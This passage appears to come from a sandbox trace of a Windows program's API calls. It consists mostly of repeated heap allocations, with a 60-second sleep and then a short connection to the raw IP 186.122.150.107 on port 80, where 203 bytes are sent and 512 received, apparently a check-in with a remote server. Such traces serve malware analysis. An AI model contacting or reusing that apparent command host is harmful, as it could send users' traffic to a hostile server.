Size=0x140) returned 0x22057e8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d55f8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d5868 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d6360 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d6498 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d7470 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d6978 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d6ab0 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d5d48 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d59a0 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d5c10 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x21d6be8 [0155.087] Sleep (dwMilliseconds=0xea60) [0165.184] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0165.184] socket (af=2, type=1, protocol=6) returned 0x210 [0165.186] htons (hostshort=0x50) returned 0x5000 [0165.186] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0165.186] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0165.188] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0165.188] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0165.188] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0165.188] connect (s=0x210, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0165.444] send (s=0x210, buf=0x19d8f8*, len=203, flags=0) returned 203 [0165.444] recv (in: s=0x210, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0165.728] closesocket (s=0x210) returned 0 [0165.729] WSACleanup () returned 0 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22394a8 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223b2d8 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223a3c0 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223a198 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223b500 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223a5e8 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223b950 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223bda0 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2238e30 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22398f8 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2239b20 [0165.729] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223bb78 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223bfc8 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x223c1f0 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x223c418 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2238368 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22389e0 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2239058 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x223a810 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2238590 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2239280 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x223ae88 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22396d0 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22387b8 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2238c08 [0165.730] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x226f548 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x226eca8 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2270460 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2270688 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2270010 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2242e10 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2242c08 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2243630 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2240d90 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22411a0 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2240368 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2243a40 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2240980 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22417b8 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2243c48 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2243e50 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22413a8 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2244058 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22415b0 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2241bc8 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2243220 [0165.731] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245138 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245330 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2248078 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2247c88 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2244568 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22460f8 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245b10 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245528 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2247e80 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245d08 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2246ec0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245918 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22462f0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2246ad0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2246cc8 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2245720 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2248750 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2248568 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224a200 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2248938 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224a7b8 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224b510 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224a5d0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224a9a0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2248b20 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224bac8 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2249690 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224ab88 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2248d08 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2249e30 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x22492c0 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x224ad70 [0165.732] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2214688 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22167b8 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22165e0 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2274748 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2272090 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2274920 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22741c0 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2271930 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2272268 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2271580 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2272618 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2271758 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22736b0 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2272440 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2271b08 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2273300 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2218048 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x221a3e8 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x221a778 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x221a5b0 [0165.733] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2276398 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2275720 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2276c80 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2275558 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2276e48 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2278018 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22761d0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22783a8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22758e8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2275ab0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2275e40 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2276ab8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221c828 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221cb98 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221aca8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221c9e0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221d5e8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221cd50 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221d7a0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221b1d0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e038 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221aaf0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e8d0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e560 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e1f0 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e3a8 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x221e718 [0165.734] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2279378 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224cc80 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224e060 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224c930 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224f790 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224d9c0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224f938 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224ce28 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224eda0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224fae0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224d178 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224deb8 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224ea50 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224db68 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224dd10 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224e208 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x224e3b0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2252110 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2252c38 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2252dd0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2250df0 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2250790 [0165.735] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22538f8 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2252440 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2252f68 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2251c48 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2253100 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2253298 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22535c8 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2251de0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2253430 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2250f88 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2251780 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2254798 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22567c0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2257588 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2256ad0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2255b80 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2255e90 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2254c30 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22559f8 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2255870 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2254f40 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22564b0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2254aa8 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2256018 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22550c8 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22561a0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2256c58 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2223ca0 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2223e18 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2224108 [0165.736] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227dbd0 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227f1d8 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227d300 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227ed70 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227e908 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227e790 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227e328 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227f4c8 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227f640 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227da58 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227f7b8 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227e4a0 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x227e1b0 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259b48 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2258798 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22599e0 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259cb0 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259878 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2258900 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2258a68 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259008 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22592d8 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259e18 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259710 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2259f80 [0165.737] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2284588 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2284858 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2283d18 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22846f0 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225ae58 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225aba8 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225bfd0 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225afb0 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b108 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b260 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225aa50 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b918 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225c3d8 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b3b8 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225c530 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b510 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b668 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225b7c0 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225ba70 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x225bbc8 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2229180 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22292c8 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2229410 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2229558 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22296a0 [0165.738] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22852a8 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2286d90 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2286728 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22869b8 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2285680 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2285910 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2285160 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2285a58 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2286870 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2286b00 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22857c8 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225c8e0 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225dd98 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225d9f0 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225e620 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225d2a0 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225ded0 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225d8b8 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225d780 [0165.739] 